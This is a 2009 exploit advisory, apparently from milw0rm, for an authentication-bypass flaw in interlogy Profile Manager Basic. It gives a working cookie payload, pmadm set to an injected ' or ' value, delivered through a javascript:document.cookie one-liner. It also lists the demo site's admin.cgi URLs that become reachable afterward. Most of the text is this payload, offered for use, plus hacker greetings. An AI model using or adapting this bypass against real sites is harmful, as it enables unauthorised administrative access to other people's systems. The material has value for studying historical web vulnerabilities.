[~] interlogy Profile Manager Basic (for ByPass) Insecure Cookie Handling Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 06/06/2009
[~]
[~] Home: yildirimordulari.com / z0rlu.blogspot.com
[~]
[~] msn: trt-turk@hotmail.com
[~]
[~] N0T: Kpss AnanI ....
[~] -----------------------------------------------------------
desc:
normal login for cookie
pmadm=dGVzdA;
if ý do this:
pmadm=dGVzd(write any thing);
example:
pmadm=dGVzdz;
or
pmadm=dGVzd123231212313;
not login
if ý do wthis:
pmadm=dGVzd ' or ';
boom this loggin :D
exp:
javascript:document.cookie = "pmadm=dGVzd ' or '; path=/";
after you go here:
http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp
or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & Stack & ThE g0bL!N & AlpHaNiX and all friends
[~]
[~] yildirimordulari.com / z0rlu.blogspot.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2009-06-08]